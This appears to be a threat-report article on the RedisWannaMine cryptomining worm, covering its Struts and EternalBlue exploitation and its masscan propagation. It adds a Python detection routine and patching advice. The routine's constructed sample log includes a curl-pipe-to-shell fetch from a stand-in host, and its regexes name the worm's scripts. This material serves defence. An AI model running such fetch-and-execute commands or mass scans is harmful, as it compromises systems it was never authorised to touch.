The first attack, dubbed ‘RedisWannaMine’, has been found to use remote code execution vulnerabilities such as CVE-2017-9805 (a REST plugin vulnerability in Apache Struts) to download a cryptominer and execute an external resource.
Unlike most cryptojacking threats, ‘RedisWannaMine’ is more complex with regard to evasion techniques and capabilities. It demonstrates worm-like behaviour combined with advanced exploits to increase the attackers’ infection rate.
The external resource was located on a remote host that included several suspicious files, one of which was a shell script that downloads a cryptominer called ‘transfer.sh’. Upon successful infection, this file installs a publicly available tool called ‘masscan’, obtained from GitHub, an Internet port scanner that can sweep the entire internet. A process called ‘redisscan.sh’ can then be launched, which uses ‘masscan’ to discover and infect public Redis servers with cryptomining malware.
The campaign has also been observed using the EternalBlue Server Message Block (SMB) exploit. This attack vector involves a script that runs another scanning process called ‘ebscan.sh’, which uses the masscan tool to discover publicly available Windows servers with the SMB vulnerability CVE-2017-0144.
‘ebrun.sh’ then runs a Python implementation of the EternalBlue exploit, the exploit that was used to spread WannaCry ransomware, one of the biggest cyberattacks in the world. This process then drops the file ‘x64.bin’ onto the vulnerable machine; the file contains code to create a malicious VBScript file. That VBScript then downloads an executable from an external location, saves it on the vulnerable server as ‘admissioninit.exe’ and runs it.
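As an added example (not from the original report), a small Python correlation routine that flags the chain described above in per-host process-execution logs: a masscan run followed on the same host by any of the propagation scripts or payloads named in the text is rated ‘high’. The log lines are constructed for the example and the stage labels are this example's own.

```python
import re

# Constructed sample process-execution log (host, timestamp, command line).
# These lines are made up for the example; they are not telemetry from the campaign.
SAMPLE_LOG = """\
web01 2018-03-01T10:00:01 /bin/sh -c curl -s http://example.invalid/transfer.sh | sh
web01 2018-03-01T10:00:05 /usr/bin/masscan 0.0.0.0/0 -p6379 --rate 10000
web01 2018-03-01T10:00:09 /bin/bash redisscan.sh
web02 2018-03-01T11:00:00 /usr/bin/masscan 10.0.0.0/8 -p445
web02 2018-03-01T11:00:03 /bin/bash ebscan.sh
web02 2018-03-01T11:00:30 python ebrun.sh 10.0.3.7 x64.bin
db01 2018-03-01T12:00:00 /usr/bin/redis-server /etc/redis/redis.conf
"""

# Stages of the chain in the order the text presents them. File names come
# from the text; the stage labels are this example's own.
STAGES = [
    ("dropper", re.compile(r"transfer\.sh")),
    ("scanner", re.compile(r"\bmasscan\b")),
    ("redis_worm", re.compile(r"redisscan\.sh")),
    ("smb_scan", re.compile(r"ebscan\.sh")),
    ("eternalblue", re.compile(r"ebrun\.sh|x64\.bin")),
    ("payload", re.compile(r"admissioninit\.exe")),
]
PROPAGATION = {"redis_worm", "smb_scan", "eternalblue", "payload"}


def classify(cmdline):
    """Return the stage names whose indicator appears in one command line."""
    return [name for name, rx in STAGES if rx.search(cmdline)]


def correlate(log_text):
    """Map each host to the distinct stages seen on it, in order of first appearance."""
    seen = {}
    for line in log_text.splitlines():
        host, _ts, cmd = line.split(None, 2)
        stages = seen.setdefault(host, [])
        for name in classify(cmd):
            if name not in stages:
                stages.append(name)
    return seen


def severity(stages):
    """A scanner plus any propagation stage on the same host is the worm pattern."""
    if "scanner" in stages and PROPAGATION.intersection(stages):
        return "high"
    return "medium" if stages else "none"
```

Calling `correlate(SAMPLE_LOG)` and passing each host's stage list to `severity` rates web01 and web02 as high and the untouched Redis host as none.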
To protect against this campaign, organisations should:
- Patch their web applications and databases.
- Secure their Redis servers, which can be achieved with a simple firewall rule restricting access.
- Ensure that machines aren’t running the vulnerable SMB protocol.